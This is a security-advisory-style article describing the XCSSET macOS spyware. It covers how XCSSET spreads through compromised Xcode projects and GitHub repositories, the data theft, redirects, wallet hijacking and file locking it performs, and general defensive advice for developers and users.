XCSSET Malware

The XCSSET Malware is spyware that compromises macOS projects during the Xcode compiling process. All users of the post-compilation programs are at risk for losing confidential Web-browsing data and may experience browser redirects, financial transaction hijackings and other attacks. Compatible anti-malware products should detect and remove the XCSSET Malware, and developers should maintain strict version control of their projects and issue rollbacks and patches as necessary.

Spyware Gets Serious about Apple Products

While Windows is under fire for most Trojan campaigns, threat actors aren't forgetting about other operating systems, and particularly, the macOS. The earlier XcodeGhost campaign's innovation of hijacking Xcode compilation is returning in another form: the XCSSET Malware. Although the overall method of infection is similar shockingly, the XCSSET Malware has a more focused payload, and prefers collecting data – or locking it.

In both campaigns, the accidental distributor is an independent developer who uses a corrupted compiler (in XcodeGhost's case) unwittingly or, possibly, previously-compromised code during the compilation process. The resulting program includes bundles additional threats inside itself, like the XCSSET Malware. So far, malware researchers have yet to see the XCSSET Malware attacks outside of Asia, and China and India appear most at risk. Significantly, the XCSSET Malware is infecting several GitHub projects – meaning that any devs who use the accidentally poisoned repositories in their pet projects also will distribute the spyware.

The XCSSET Malware uses software security oversights like a Data Vault bypass and a workaround for Safari password requests for accomplishing its primary functions of exfiltrating the victim's personal information. Besides collecting login credentials and other data, the XCSSET Malware may force the user's browser into loading unsafe website content (such as a fake bank login page), hijack social media accounts, and redirect cryptocurrency payments to other wallets dynamically.

Malware researchers further emphasize that the XCSSET Malware has a broader scope than just the browser and can snap screenshots, scrape info out of programs like Skype or Evernote, and use a dedicated, file-locking module for holding the user's media files hostage (a la Hidden Tear, the Dharma Ransomware, and the like).

Growing an Apple that's Immune to Poisonous Software Bugs

The role of developer curation in curbing the XCSSET Malware's campaign is crucial. Developers should always examine free code resources for potential bugs or other security oversights, including telltale signs of embedded Trojans. As with XcodeGhost, macOS users should continue using GateKeeper and other, compatible security products for their protection, while also vetting their downloads for symptoms of danger, such as poor reviews.

During the XCSSET Malware infections, users should avoid Internet contact and limit the theft of passwords and related hijackings of accounts, credit cards, etc. Cryptocurrency (Bitcoin, Monero, et al.) users also should double-check any transactions for wallet address changes before finalizing their payments. Avoiding the usage of the same passwords for multiple accounts, abiding by best practices like installing software updates quickly, and other security guidelines will mitigate the risk of lingering damage from the XCSSET Malware attacks.

Of course, users should have compatible anti-malware tools for their system or device to remove the XCSSET Malware immediately. They also may require external backups for content restoration, assuming that the XCSSET Malware's file-locking module triggers.

With money on its mind in any way that it can get it, the XCSSET Malware is an incredible threat to Apple's operating system and its users. Owning a minority brand of hardware doesn't harden anyone against all Trojan attacks, particularly when, as in this case, it's a metaphorical phone call coming from inside the building.